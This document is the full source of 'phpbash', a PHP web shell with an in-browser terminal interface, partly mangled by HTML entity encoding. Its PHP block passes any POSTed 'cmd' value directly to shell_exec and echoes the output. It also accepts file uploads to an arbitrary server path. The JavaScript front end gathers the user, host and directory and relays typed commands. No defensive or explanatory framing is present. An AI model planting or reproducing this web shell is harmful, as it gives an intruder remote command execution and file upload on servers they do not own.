/* phpbash by Alexander Reid (Arrexel) */if (ISSET($_POST[&#039;cmd&#039;])) {$output = preg_split(&#039;/[\n]/&#039;, shell_exec($_POST[&#039;cmd&#039;].&quot; 2&gt;&amp;1&quot;));foreach ($output as $line) {echo htmlentities($line, ENT_QUOTES | ENT_HTML5, &#039;UTF-8&#039;) . &quot;<br>&quot;;}die();} else if (!empty($_FILES[&#039;file&#039;][&#039;tmp_name&#039;]) &amp;&amp; !empty($_POST[&#039;path&#039;])) {$filename = $_FILES[&quot;file&quot;][&quot;name&quot;];$path = $_POST[&#039;path&#039;];if ($path != &quot;/&quot;) {$path .= &quot;/&quot;;}if (move_uploaded_file($_FILES[&quot;file&quot;][&quot;tmp_name&quot;], $path.$filename)) {echo htmlentities($filename) . &quot; successfully uploaded to &quot; . htmlentities($path);} else {echo &quot;Error uploading &quot; . htmlentities($filename);}die();}<html><head><title></title>&lt;title&gt;&lt;/title&gt;&lt;style&gt;html, body {max-width: 100%;}body {width: 100%;height: 100%;margin: 0;background: #000;}body, .inputtext {font-family: &quot;Lucida Console&quot;, &quot;Lucida Sans Typewriter&quot;, monaco, &quot;Bitstream Vera Sans Mono&quot;, monospace;font-size: 14px;font-style: normal;font-variant: normal;font-weight: 400;line-height: 20px;overflow: hidden;}.console {width: 100%;height: 100%;margin: auto;position: absolute;color: #fff;}.output {width: auto;height: auto;position: absolute;overflow-y: scroll;top: 0;bottom: 30px;left: 5px;right: 0;line-height: 20px;}.input form {position: relative;margin-bottom: 0px;}.username {height: 30px;width: auto;padding-left: 5px;line-height: 30px;float: left;}.input {border-top: 1px solid #333333;width: 100%;height: 30px;position: absolute;bottom: 0;}.inputtext {width: auto;height: 30px;bottom: 0px;margin-bottom: 0px;background: #000;border: 0;float: left;padding-left: 8px;color: #fff;}.inputtext:focus {outline: none;}::-webkit-scrollbar {width: 12px;}::-webkit-scrollbar-track {background: #101010;}::-webkit-scrollbar-thumb {background: #303030;}&lt;/style&gt;</head><body>&lt;div class=&quot;console&quot;&gt;&lt;div class=&quot;output&quot; id=&quot;output&quot;&gt;&lt;/div&gt;&lt;div class=&quot;input&quot; id=&quot;input&quot;&gt;<form>&lt;div class=&quot;username&quot; id=&quot;username&quot;&gt;&lt;/div&gt;<input type=text></form>&lt;/div&gt;&lt;/div&gt;<form><input type=file></form>&lt;script type=&quot;text/javascript&quot;&gt;var username = &quot;&quot;;var hostname = &quot;&quot;;var currentDir = &quot;&quot;;var previousDir = &quot;&quot;;var defaultDir = &quot;&quot;;var commandHistory = [];var currentCommand = 0;var inputTextElement = document.getElementById(&#039;inputtext&#039;);var inputElement = document.getElementById(&quot;input&quot;);var outputElement = document.getElementById(&quot;output&quot;);var usernameElement = document.getElementById(&quot;username&quot;);var uploadFormElement = document.getElementById(&quot;upload&quot;);var fileBrowserElement = document.getElementById(&quot;filebrowser&quot;);getShellInfo();function getShellInfo() {var request = new XMLHttpRequest();request.onreadystatechange = function() {if (request.readyState == XMLHttpRequest.DONE) {var parsedResponse = request.responseText.split(&quot;<br>&quot;);username = parsedResponse[0];hostname = parsedResponse[1];currentDir = parsedResponse[2].replace(new RegExp(&quot;&amp;sol;&quot;, &quot;g&quot;), &quot;/&quot;);defaultDir = currentDir;usernameElement.innerHTML = &quot;&lt;div style=&#039;color: #ff0000; display: inline;&#039;&gt;&quot;+username+&quot;@&quot;+hostname+&quot;&lt;/div&gt;:&quot;+currentDir+&quot;#&quot;;updateInputWidth();}};request.open(&quot;POST&quot;, &quot;&quot;, true);request.setRequestHeader(&quot;Content-type&quot;, &quot;application/x-www-form-urlencoded&quot;);request.send(&quot;cmd=whoami; hostname; pwd&quot;);}function sendCommand() {var request = new XMLHttpRequest();var command = inputTextElement.value;var originalCommand = command;var originalDir = currentDir;var cd = false;commandHistory.push(originalCommand);switchCommand(commandHistory.length);inputTextElement.value = &quot;&quot;;var parsedCommand = command.split(&quot; &quot;);if (parsedCommand[0] == &quot;cd&quot;) {cd = true;if (parsedCommand.length == 1) {command = &quot;cd &quot;+defaultDir+&quot;; pwd&quot;;} else if (parsedCommand[1] == &quot;-&quot;) {command = &quot;cd &quot;+previousDir+&quot;; pwd&quot;;} else {command = &quot;cd &quot;+currentDir+&quot;; &quot;+command+&quot;; pwd&quot;;}} else if (parsedCommand[0] == &quot;clear&quot;) {outputElement.innerHTML = &quot;&quot;;return false;} else if (parsedCommand[0] == &quot;upload&quot;) {fileBrowserElement.click();return false;} else {command = &quot;cd &quot;+currentDir+&quot;; &quot; + command;}request.onreadystatechange = function() {if (request.readyState == XMLHttpRequest.DONE) {if (cd) {var parsedResponse = request.responseText.split(&quot;<br>&quot;);previousDir = currentDir;currentDir = parsedResponse[0].replace(new RegExp(&quot;&amp;sol;&quot;, &quot;g&quot;), &quot;/&quot;);outputElement.innerHTML += &quot;&lt;div style=&#039;color:#ff0000; float: left;&#039;&gt;&quot;+username+&quot;@&quot;+hostname+&quot;&lt;/div&gt;&lt;div style=&#039;float: left;&#039;&gt;&quot;+&quot;:&quot;+originalDir+&quot;# &quot;+originalCommand+&quot;&lt;/div&gt;<br>&quot;;usernameElement.innerHTML = &quot;&lt;div style=&#039;color: #ff0000; display: inline;&#039;&gt;&quot;+username+&quot;@&quot;+hostname+&quot;&lt;/div&gt;:&quot;+currentDir+&quot;#&quot;;} else {outputElement.innerHTML += &quot;&lt;div style=&#039;color:#ff0000; float: left;&#039;&gt;&quot;+username+&quot;@&quot;+hostname+&quot;&lt;/div&gt;&lt;div style=&#039;float: left;&#039;&gt;&quot;+&quot;:&quot;+currentDir+&quot;# &quot;+originalCommand+&quot;&lt;/div&gt;<br>&quot; + request.responseText.replace(new RegExp(&quot;<br><br>$&quot;), &quot;<br>&quot;);outputElement.scrollTop = outputElement.scrollHeight;}updateInputWidth();}};request.open(&quot;POST&quot;, &quot;&quot;, true);request.setRequestHeader(&quot;Content-type&quot;, &quot;application/x-www-form-urlencoded&quot;);request.send(&quot;cmd=&quot;+encodeURIComponent(command));return false;}function uploadFile() {var formData = new FormData();formData.append(&#039;file&#039;, fileBrowserElement.files[0], fileBrowserElement.files[0].name);formData.append(&#039;path&#039;, currentDir);var request = new XMLHttpRequest();request.onreadystatechange = function() {if (request.readyState == XMLHttpRequest.DONE) {outputElement.innerHTML += request.responseText+&quot;<br>&quot;;}};request.open(&quot;POST&quot;, &quot;&quot;, true);request.send(formData);outputElement.innerHTML += &quot;&lt;div style=&#039;color:#ff0000; float: left;&#039;&gt;&quot;+username+&quot;@&quot;+hostname+&quot;&lt;/div&gt;&lt;div style=&#039;float: left;&#039;&gt;&quot;+&quot;:&quot;+currentDir+&quot;# Uploading &quot;+fileBrowserElement.files[0].name+&quot;...&lt;/div&gt;<br>&quot;;}function updateInputWidth() {inputTextElement.style.width = inputElement.clientWidth - usernameElement.clientWidth - 15;}document.onkeydown = checkForArrowKeys;function checkForArrowKeys(e) {e = e || window.event;if (e.keyCode == &#039;38&#039;) {previousCommand();} else if (e.keyCode == &#039;40&#039;) {nextCommand();}}function previousCommand() {if (currentCommand != 0) {switchCommand(currentCommand-1);}}function nextCommand() {if (currentCommand != commandHistory.length) {switchCommand(currentCommand+1);}}function switchCommand(newCommand) {currentCommand = newCommand;if (currentCommand == commandHistory.length) {inputTextElement.value = &quot;&quot;;} else {inputTextElement.value = commandHistory[currentCommand];setTimeout(function(){ inputTextElement.selectionStart = inputTextElement.selectionEnd = 10000; }, 0);}}document.getElementById(&quot;form&quot;).addEventListener(&quot;submit&quot;, function(event){event.preventDefault()});&lt;/script&gt;</body></html>